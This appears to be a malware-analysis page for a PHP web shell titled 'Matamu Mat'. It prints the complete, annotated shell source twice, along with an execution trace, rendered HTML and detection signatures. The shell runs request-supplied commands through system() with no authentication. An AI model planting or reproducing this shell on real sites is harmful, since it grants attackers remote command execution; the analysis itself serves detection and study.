PHP Malware Analysis

shell.php.txt

md5: 1a95f0163b6dea771da1694de13a3d8d


Deobfuscated PHP code (note: this sample carries no obfuscation — the listing below is the original source at the bottom of the page, merely reformatted, so nothing here was hidden from static inspection)

<?php

/* NOTE(analysis): version banner of the web shell. The constant name and
   value are a cheap static signature; together with the form field names
   work_dir / command / stderr / submit_btn, the "Execute Command" button
   label and the <title> "Matamu Mat" a few lines below, they identify this
   sample in page content, WAF logs and request bodies. The constant name and
   overall layout suggest the code was derived from the open-source PHPShell
   project. */
define('PHPSHELL_VERSION', '1.7');
?>

<html>
<head>
<title> Matamu Mat </title>
</head>
<body>
<hr><br>

<?php 
/* NOTE(analysis): register_globals emulation. On a legacy interpreter this
   turns every request parameter into a PHP global, so $work_dir and $command
   below are attacker-controlled straight from the URL or POST body; there is
   no authentication anywhere in the file. The extraction order is POST, then
   GET, then SERVER, so a GET parameter overrides a POST parameter of the same
   name. On current PHP the $HTTP_*_VARS long arrays and register_globals no
   longer exist (removed in 5.4): ini_get() returns FALSE, the branch is
   entered, but the arrays are empty and nothing is extracted -- the trace on
   this page shows no extract() call, so on such hosts the command path is
   inert unless something else populates these globals. */
if (ini_get('register_globals') != '1') {
    /* We'll register the variables as globals: */
    if (!empty($HTTP_POST_VARS)) {
        extract($HTTP_POST_VARS);
    }
    if (!empty($HTTP_GET_VARS)) {
        extract($HTTP_GET_VARS);
    }
    if (!empty($HTTP_SERVER_VARS)) {
        extract($HTTP_SERVER_VARS);
    }
}
/* First we check if there has been asked for a working directory.
   $work_dir arrives raw from the request; no allow-list or confinement is
   applied, so any directory readable by the web-server user can be selected. */
if (!empty($work_dir)) {
    /* A workdir has been asked for */
    if (!empty($command)) {
        /* 'cd <dir>' is intercepted here instead of being handed to the shell.
           NOTE(analysis): ereg() was removed in PHP 7.0, so on a PHP 7+ host a
           cd command aborts the request with an undefined-function error
           before system() is reached. */
        if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
            /* We try and match a cd command. */
            if ($regs[1][0] == '/') {
                $new_dir = $regs[1];
                // 'cd /something/...'
            } else {
                $new_dir = $work_dir . '/' . $regs[1];
                // 'cd somedir/...'
            }
            /* Only existence and directory-ness are checked; no containment. */
            if (file_exists($new_dir) && is_dir($new_dir)) {
                $work_dir = $new_dir;
            }
            /* The cd is consumed here; it never reaches system() below. */
            unset($command);
        }
    }
}
if (file_exists($work_dir) && is_dir($work_dir)) {
    /* We change directory to that dir: this chdir is what makes the relative
       readdir()/is_dir() calls and the cwd of system() further down operate
       in the attacker-chosen directory. */
    chdir($work_dir);
}
/* We now update $work_dir to avoid things like '/foo/../bar':
   canonicalisation is done by spawning a shell. NOTE(analysis): this runs on
   every request, parameters or not (visible in the trace on this page), so a
   web-server worker executing `pwd` through the shell is a usable detection
   signal for this sample even when no command is ever issued. */
$work_dir = exec('pwd');
?>

<form name="myform" action="<?php 
/* NOTE(analysis): $PHP_SELF is written unescaped into the action attribute
   and into every breadcrumb link below. Under the register_globals-style
   extraction above it is attacker-influenceable (it can carry PATH_INFO),
   a classic reflected-XSS vector; on current PHP it is undefined, which is
   why the generated HTML on this page shows action="" and bare ?work_dir=
   links. */
echo $PHP_SELF;
?>" method="post">
<p>Current working directory: <b>
<?php 
/* Breadcrumb of the canonical cwd: each path prefix becomes a GET link that
   re-selects that directory. urlencode() is applied to the query value only;
   the visible segment name is echoed raw into the page. */
$work_dir_splitted = explode('/', substr($work_dir, 1));
echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
if (!empty($work_dir_splitted[0])) {
    $path = '';
    for ($i = 0; $i < count($work_dir_splitted); $i++) {
        $path .= '/' . $work_dir_splitted[$i];
        printf('<a href="%s?work_dir=%s">%s</a>/', $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
    }
}
?></b></p>
<p>Choose new working directory:
<select name="work_dir" onChange="this.form.submit()">
<?php 
/* Now we make a list of the directories. Entries are read relative to the
   cwd set by chdir() above, so this enumerates whatever directory the
   attacker selected. Directory names are interpolated into <option value>
   without any HTML escaping. The loop condition tests truthiness, so an
   entry literally named "0" ends the listing early. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
    if (is_dir($dir)) {
        if ($dir == '.') {
            echo "<option value=\"{$work_dir}\" selected>Current Directory</option>\n";
        } elseif ($dir == '..') {
            /* We have found the parent dir. We must be careful if the parent
               directory is the root directory (/). */
            if (strlen($work_dir) == 1) {
                /* work_dir is only 1 character - it can only be / There's no
                   parent directory then. */
            } elseif (strrpos($work_dir, '/') == 0) {
                /* The only '/' is the first character: a top-level directory
                   such as /bin or /home, whose parent is the root. */
                echo "<option value=\"/\">Parent Directory</option>\n";
            } else {
                /* Parent = everything before the last '/', computed by
                   reversing, cutting at the first '/', and reversing back. */
                echo "<option value=\"" . strrev(substr(strstr(strrev($work_dir), "/"), 1)) . "\">Parent Directory</option>\n";
            }
        } else {
            /* Avoid a double slash when the cwd is the root directory. */
            if ($work_dir == '/') {
                echo "<option value=\"{$work_dir}{$dir}\">{$dir}</option>\n";
            } else {
                echo "<option value=\"{$work_dir}/{$dir}\">{$dir}</option>\n";
            }
        }
    }
}
closedir($dir_handle);
?>

</select></p>

<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>

<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly>

<?php 
/* NOTE(analysis): the RCE sink. $command is passed to system() exactly as
   received -- no escapeshellcmd(), no allow-list, no authentication -- and
   runs as the web-server user in the directory chosen above. Output is
   rendered inside the read-only <textarea>. Host-side artefacts worth
   hunting for: a web-server child running `ls -F` (the only rewrite applied,
   to a bare `ls`), and short-lived /tmp/phpshell* files created by tempnam()
   and removed by the appended `rm` when stderr capture is enabled. */
if (!empty($command)) {
    /* Any truthy value of the 'stderr' checkbox enables the redirect. */
    if ($stderr) {
        $tmpfile = tempnam('/tmp', 'phpshell');
        /* stdout and stderr are redirected to the temp file, which is then
           cat'd and deleted within the same shell invocation. */
        $command .= " 1> {$tmpfile} 2>&1; " . "cat {$tmpfile}; rm {$tmpfile}";
    } else {
        if ($command == 'ls') {
            /* ls looks much better with ' -F', IMHO. */
            $command .= ' -F';
        }
    }
    system($command);
}
?>

</textarea>
</form>

<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>

<hr>

</body>
</html>

Execution traces (Xdebug function trace of a single request to the sample with no parameters: ini_get('register_globals') returns FALSE, the $HTTP_*_VARS arrays are absent so extract() is never called, and only exec('pwd') and the directory listing run — the system() command path was not exercised; the line numbers in the trace refer to the original listing at the bottom of this page)

data/traces/1a95f0163b6dea771da1694de13a3d8d_trace-1676254933.0947.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:22:38.992520]
1	0	1	0.000178	393528
1	3	0	0.000332	411792	{main}	1		/var/www/html/uploads/shell.php.txt	0	0
2	4	0	0.000349	411792	define	0		/var/www/html/uploads/shell.php.txt	3	2	'PHPSHELL_VERSION'	'1.7'
2	4	1	0.000372	411896
2	4	R			TRUE
2	5	0	0.000389	411824	ini_get	0		/var/www/html/uploads/shell.php.txt	16	1	'register_globals'
2	5	1	0.000403	411856
2	5	R			FALSE
2	6	0	0.000434	411824	file_exists	0		/var/www/html/uploads/shell.php.txt	47	1	NULL
2	6	1	0.000448	411864
2	6	R			FALSE
2	7	0	0.000461	411824	exec	0		/var/www/html/uploads/shell.php.txt	53	1	'pwd'
2	7	1	0.001155	411904
2	7	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/shell.php.txt	53	$work_dir = '/var/www/html/uploads'
2	8	0	0.001207	411872	substr	0		/var/www/html/uploads/shell.php.txt	61	2	'/var/www/html/uploads'	1
2	8	1	0.001223	411984
2	8	R			'var/www/html/uploads'
2	9	0	0.001238	411920	explode	0		/var/www/html/uploads/shell.php.txt	61	2	'/'	'var/www/html/uploads'
2	9	1	0.001253	412496
2	9	R			[0 => 'var', 1 => 'www', 2 => 'html', 3 => 'uploads']
1		A						/var/www/html/uploads/shell.php.txt	61	$work_dir_splitted = [0 => 'var', 1 => 'www', 2 => 'html', 3 => 'uploads']
1		A						/var/www/html/uploads/shell.php.txt	66	$path = ''
1		A						/var/www/html/uploads/shell.php.txt	67	$i = 0
1		A						/var/www/html/uploads/shell.php.txt	68	$path .= '/var'
2	10	0	0.001330	412408	urlencode	0		/var/www/html/uploads/shell.php.txt	70	1	'/var'
2	10	1	0.001344	412472
2	10	R			'%2Fvar'
2	11	0	0.001357	412440	printf	0		/var/www/html/uploads/shell.php.txt	70	4	'<a href="%s?work_dir=%s">%s</a>/'	NULL	'%2Fvar'	'var'
2	11	1	0.001376	412504
2	11	R			35
1		A						/var/www/html/uploads/shell.php.txt	67	$i++
1		A						/var/www/html/uploads/shell.php.txt	68	$path .= '/www'
2	12	0	0.001413	412416	urlencode	0		/var/www/html/uploads/shell.php.txt	70	1	'/var/www'
2	12	1	0.001426	412488
2	12	R			'%2Fvar%2Fwww'
2	13	0	0.001440	412456	printf	0		/var/www/html/uploads/shell.php.txt	70	4	'<a href="%s?work_dir=%s">%s</a>/'	NULL	'%2Fvar%2Fwww'	'www'
2	13	1	0.001457	412520
2	13	R			41
1		A						/var/www/html/uploads/shell.php.txt	67	$i++
1		A						/var/www/html/uploads/shell.php.txt	68	$path .= '/html'
2	14	0	0.001493	412416	urlencode	0		/var/www/html/uploads/shell.php.txt	70	1	'/var/www/html'
2	14	1	0.001506	412496
2	14	R			'%2Fvar%2Fwww%2Fhtml'
2	15	0	0.001520	412464	printf	0		/var/www/html/uploads/shell.php.txt	70	4	'<a href="%s?work_dir=%s">%s</a>/'	NULL	'%2Fvar%2Fwww%2Fhtml'	'html'
2	15	1	0.001537	412528
2	15	R			49
1		A						/var/www/html/uploads/shell.php.txt	67	$i++
1		A						/var/www/html/uploads/shell.php.txt	68	$path .= '/uploads'
2	16	0	0.001573	412424	urlencode	0		/var/www/html/uploads/shell.php.txt	70	1	'/var/www/html/uploads'
2	16	1	0.001586	412512
2	16	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads'
2	17	0	0.001601	412480	printf	0		/var/www/html/uploads/shell.php.txt	70	4	'<a href="%s?work_dir=%s">%s</a>/'	NULL	'%2Fvar%2Fwww%2Fhtml%2Fuploads'	'uploads'
2	17	1	0.001619	412544
2	17	R			62
1		A						/var/www/html/uploads/shell.php.txt	67	$i++
2	18	0	0.001640	412424	opendir	0		/var/www/html/uploads/shell.php.txt	79	1	'/var/www/html/uploads'
2	18	1	0.001661	412816
2	18	R			resource(5) of type (stream)
1		A						/var/www/html/uploads/shell.php.txt	79	$dir_handle = resource(5) of type (stream)
2	19	0	0.001698	412784	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	19	1	0.001719	412856
2	19	R			'..'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = '..'
2	20	0	0.001743	412816	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'..'
2	20	1	0.001759	412864
2	20	R			TRUE
2	21	0	0.001791	412824	strrpos	0		/var/www/html/uploads/shell.php.txt	91	2	'/var/www/html/uploads'	'/'
2	21	1	0.001806	412896
2	21	R			13
2	22	0	0.001818	412824	strrev	0		/var/www/html/uploads/shell.php.txt	99	1	'/var/www/html/uploads'
2	22	1	0.001831	412904
2	22	R			'sdaolpu/lmth/www/rav/'
2	23	0	0.001845	412872	strstr	0		/var/www/html/uploads/shell.php.txt	99	2	'sdaolpu/lmth/www/rav/'	'/'
2	23	1	0.001864	412984
2	23	R			'/lmth/www/rav/'
2	24	0	0.001879	412864	substr	0		/var/www/html/uploads/shell.php.txt	99	2	'/lmth/www/rav/'	1
2	24	1	0.001892	412968
2	24	R			'lmth/www/rav/'
2	25	0	0.001905	412864	strrev	0		/var/www/html/uploads/shell.php.txt	99	1	'lmth/www/rav/'
2	25	1	0.001916	412936
2	25	R			'/var/www/html'
2	26	0	0.001930	412824	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	26	1	0.001944	412896
2	26	R			'.'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = '.'
2	27	0	0.001967	412824	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'.'
2	27	1	0.001981	412864
2	27	R			TRUE
2	28	0	0.001995	412824	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	28	1	0.002008	412904
2	28	R			'prepend.php'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = 'prepend.php'
2	29	0	0.002032	412832	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'prepend.php'
2	29	1	0.002046	412880
2	29	R			FALSE
2	30	0	0.002059	412840	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	30	1	0.002072	412912
2	30	R			'data'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = 'data'
2	31	0	0.002094	412832	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'data'
2	31	1	0.002108	412864
2	31	R			TRUE
2	32	0	0.002121	412824	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	32	1	0.002134	412904
2	32	R			'shell.php.txt'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = 'shell.php.txt'
2	33	0	0.002158	412832	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'shell.php.txt'
2	33	1	0.002171	412880
2	33	R			FALSE
2	34	0	0.002184	412840	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	34	1	0.002197	412920
2	34	R			'.htaccess'
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = '.htaccess'
2	35	0	0.002220	412840	is_dir	0		/var/www/html/uploads/shell.php.txt	82	1	'.htaccess'
2	35	1	0.002234	412880
2	35	R			FALSE
2	36	0	0.002246	412840	readdir	0		/var/www/html/uploads/shell.php.txt	81	1	resource(5) of type (stream)
2	36	1	0.002260	412880
2	36	R			FALSE
1		A						/var/www/html/uploads/shell.php.txt	81	$dir = FALSE
2	37	0	0.002282	412800	closedir	0		/var/www/html/uploads/shell.php.txt	110	1	resource(5) of type (stream)
2	37	1	0.002298	412616
2	37	R			NULL
1	3	1	0.002313	412576
			0.002347	315176
TRACE END   [2023-02-13 00:22:38.994725]


Generated HTML code (rendered output; captured with /var/www/html as the working directory, unlike the /var/www/html/uploads of the trace above, and with $PHP_SELF undefined — hence the empty form action and the bare ?work_dir= links)

<html><head>
<title> Matamu Mat </title>
</head>
<body>
<hr><br>


<form name="myform" action="" method="post">
<p>Current working directory: <b>
<a href="?work_dir=/">Root</a>/<a href="?work_dir=%2Fvar">var</a>/<a href="?work_dir=%2Fvar%2Fwww">www</a>/<a href="?work_dir=%2Fvar%2Fwww%2Fhtml">html</a>/</b></p>
<p>Choose new working directory:
<select name="work_dir" onchange="this.form.submit()">
<option value="/var/www">Parent Directory</option>
<option value="/var/www/html" selected="">Current Directory</option>

</select></p>

<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>

<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly="">

</textarea>
</form>

<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>

<hr>



</body></html>

Original PHP code

<?php

/* NOTE(analysis): version banner of the web shell. The constant name and
   value are a cheap static signature; together with the form field names
   work_dir / command / stderr / submit_btn, the "Execute Command" button
   label and the <title> "Matamu Mat" a few lines below, they identify this
   sample in page content, WAF logs and request bodies. The constant name and
   overall layout suggest the code was derived from the open-source PHPShell
   project. */
define('PHPSHELL_VERSION', '1.7');

?>

<html>
<head>
<title> Matamu Mat </title>
</head>
<body>
<hr><br>

<?php

/* NOTE(analysis): register_globals emulation. On a legacy interpreter this
   turns every request parameter into a PHP global, so $work_dir and $command
   below are attacker-controlled straight from the URL or POST body; there is
   no authentication anywhere in the file. The extraction order is POST, then
   GET, then SERVER, so a GET parameter overrides a POST parameter of the same
   name. On current PHP the $HTTP_*_VARS long arrays and register_globals no
   longer exist (removed in 5.4): ini_get() returns FALSE, the branch is
   entered, but the arrays are empty and nothing is extracted -- the trace on
   this page shows no extract() call, so on such hosts the command path is
   inert unless something else populates these globals. */
if (ini_get('register_globals') != '1') {
  /* We'll register the variables as globals: */
  if (!empty($HTTP_POST_VARS))
    extract($HTTP_POST_VARS);
  
  if (!empty($HTTP_GET_VARS))
    extract($HTTP_GET_VARS);

  if (!empty($HTTP_SERVER_VARS))
    extract($HTTP_SERVER_VARS);
}

/* First we check if there has been asked for a working directory.
   $work_dir arrives raw from the request; no allow-list or confinement is
   applied, so any directory readable by the web-server user can be selected. */
if (!empty($work_dir)) {
  /* A workdir has been asked for */
  if (!empty($command)) {
    /* 'cd <dir>' is intercepted here instead of being handed to the shell.
       NOTE(analysis): ereg() was removed in PHP 7.0, so on a PHP 7+ host a
       cd command aborts the request with an undefined-function error before
       system() is reached. */
    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
      /* We try and match a cd command. */
      if ($regs[1][0] == '/') {
        $new_dir = $regs[1]; // 'cd /something/...'
      } else {
        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
      }
      /* Only existence and directory-ness are checked; no containment. */
      if (file_exists($new_dir) && is_dir($new_dir)) {
        $work_dir = $new_dir;
      }
      /* The cd is consumed here; it never reaches system() below. */
      unset($command);
    }
  }
}

if (file_exists($work_dir) && is_dir($work_dir)) {
  /* We change directory to that dir: this chdir is what makes the relative
     readdir()/is_dir() calls and the cwd of system() further down operate
     in the attacker-chosen directory. */
  chdir($work_dir);
}

/* We now update $work_dir to avoid things like '/foo/../bar':
   canonicalisation is done by spawning a shell. NOTE(analysis): this runs on
   every request, parameters or not (visible in the trace on this page), so a
   web-server worker executing `pwd` through the shell is a usable detection
   signal for this sample even when no command is ever issued. */
$work_dir = exec('pwd');

?>

<form name="myform" action="<?php /* unescaped $PHP_SELF -- see note below */ echo $PHP_SELF ?>" method="post">
<p>Current working directory: <b>
<?php

/* NOTE(analysis): $PHP_SELF is written unescaped into the form action above
   and into every breadcrumb link here. Under the register_globals-style
   extraction earlier it is attacker-influenceable (it can carry PATH_INFO),
   a classic reflected-XSS vector; on current PHP it is undefined, which is
   why the generated HTML on this page shows action="" and bare ?work_dir=
   links. Breadcrumb: each path prefix of the canonical cwd becomes a GET
   link that re-selects that directory; urlencode() covers the query value
   only, the visible segment name is echoed raw. */
$work_dir_splitted = explode('/', substr($work_dir, 1));

echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';

if (!empty($work_dir_splitted[0])) {
  $path = '';
  for ($i = 0; $i < count($work_dir_splitted); $i++) {
    $path .= '/' . $work_dir_splitted[$i];
    printf('<a href="%s?work_dir=%s">%s</a>/',
           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
  }
}

?></b></p>
<p>Choose new working directory:
<select name="work_dir" onChange="this.form.submit()">
<?php
/* Now we make a list of the directories. Entries are read relative to the
   cwd set by chdir() above, so this enumerates whatever directory the
   attacker selected. Directory names are interpolated into <option value>
   without any HTML escaping. The loop condition tests truthiness, so an
   entry literally named "0" ends the listing early. */
$dir_handle = opendir($work_dir);
/* Run through all the files and directories to find the dirs. */
while ($dir = readdir($dir_handle)) {
  if (is_dir($dir)) {
    if ($dir == '.') {
      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
    } elseif ($dir == '..') {
      /* We have found the parent dir. We must be careful if the parent
         directory is the root directory (/). */
      if (strlen($work_dir) == 1) {
        /* work_dir is only 1 character - it can only be / There's no
           parent directory then. */
      } elseif (strrpos($work_dir, '/') == 0) {
        /* The last / in work_dir was the first character. This means that
           we have a top-level directory, e.g. /bin or /home, whose parent
           is the root. */
      echo "<option value=\"/\">Parent Directory</option>\n";
      } else {
      /* Parent = everything before the last '/', computed by reversing,
         cutting at the first '/', and reversing back. */
      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
      }
    } else {
      /* Avoid a double slash when the cwd is the root directory. */
      if ($work_dir == '/') {
	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
      } else {
	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
      }
    }
  }
}
closedir($dir_handle);

?>

</select></p>

<p>Command: <input type="text" name="command" size="60">
<input name="submit_btn" type="submit" value="Execute Command"></p>

<p>Enable <code>stderr</code>-trapping? <input type="checkbox" name="stderr"></p>
<textarea cols="80" rows="20" readonly>

<?php
/* NOTE(analysis): the RCE sink. $command is passed to system() exactly as
   received -- no escapeshellcmd(), no allow-list, no authentication -- and
   runs as the web-server user in the directory chosen above. Output is
   rendered inside the read-only <textarea>. Host-side artefacts worth
   hunting for: a web-server child running `ls -F` (the only rewrite applied,
   to a bare `ls`), and short-lived /tmp/phpshell* files created by tempnam()
   and removed by the appended `rm` when stderr capture is enabled. */
if (!empty($command)) {
  /* Any truthy value of the 'stderr' checkbox enables the redirect. */
  if ($stderr) {
    $tmpfile = tempnam('/tmp', 'phpshell');
    /* stdout and stderr are redirected to the temp file, which is then
       cat'd and deleted within the same shell invocation. */
    $command .= " 1> $tmpfile 2>&1; " .
    "cat $tmpfile; rm $tmpfile";
  } else if ($command == 'ls') {
    /* ls looks much better with ' -F', IMHO. */
    $command .= ' -F';
  }
  system($command);
}
?>

</textarea>
</form>

<script language="JavaScript" type="text/javascript">
document.forms[0].command.focus();
</script>

<hr>

</body>
</html>